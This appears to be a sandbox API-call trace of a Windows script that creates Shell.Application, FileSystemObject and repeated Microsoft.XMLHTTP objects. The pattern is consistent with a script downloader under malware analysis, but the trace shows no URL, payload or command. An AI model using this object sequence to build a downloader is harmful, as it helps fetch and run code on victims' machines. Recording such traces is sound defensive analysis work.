	[0428.693] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0428.694] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0428.694] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0428.694] SysStringLen (param_1=0x0) returned 0x0
	[0428.694] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0428.694] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0428.694] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0428.694] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0428.694] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0428.694] ??2@YAPEAX_K@Z () returned 0x62f350
	[0428.694] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0428.694] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0428.694] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0428.694] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0428.694] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0428.694] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0428.694] SysStringLen (param_1=0x0) returned 0x0
	[0428.695] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0428.698] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0428.698] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0428.698] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0428.698] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0428.698] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0428.698] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0429.434] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0429.434] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0429.434] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0429.435] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0429.435] SysStringLen (param_1=0x0) returned 0x0
	[0429.435] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0429.436] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0429.436] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7540) returned 0x0
	[0429.436] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0429.436] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0429.436] ??2@YAPEAX_K@Z () returned 0x62f310
	[0429.436] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0429.436] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0429.436] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0429.436] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7540) returned 0x0
	[0429.436] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7540) returned 0x3
	[0429.436] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0429.436] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0429.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0429.439] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0429.439] SysStringLen (param_1=0x0) returned 0x0
	[0429.439] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0429.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0429.439] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0429.439] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0429.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0429.439] ??2@YAPEAX_K@Z () returned 0x62f330
	[0429.439] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0429.439] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0429.439] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0429.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0429.439] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0429.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0429.440] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0429.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0429.440] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0429.440] SysStringLen (param_1=0x0) returned 0x0
	[0429.440] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0429.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0429.440] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0429.440] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0429.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0429.440] ??2@YAPEAX_K@Z () returned 0x62f310
	[0429.440] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0429.440] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0429.440] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0429.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0429.440] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0429.441] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0429.441] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0429.441] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0429.441] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0429.441] SysStringLen (param_1=0x0) returned 0x0
	[0429.441] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0429.441] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0429.441] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0429.441] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0429.441] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0429.441] ??2@YAPEAX_K@Z () returned 0x62f330
	[0429.441] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0429.441] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0429.441] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0429.441] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0429.441] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0429.442] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0429.442] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0429.442] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0429.442] longjmp () 
	[0429.442] longjmp () 
	[0429.442] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0429.442] SysStringLen (param_1=0x0) returned 0x0
	[0429.442] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0429.442] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0429.442] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0429.442] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0429.442] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0429.442] ??2@YAPEAX_K@Z () returned 0x62f310
	[0429.442] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0429.442] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0429.442] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
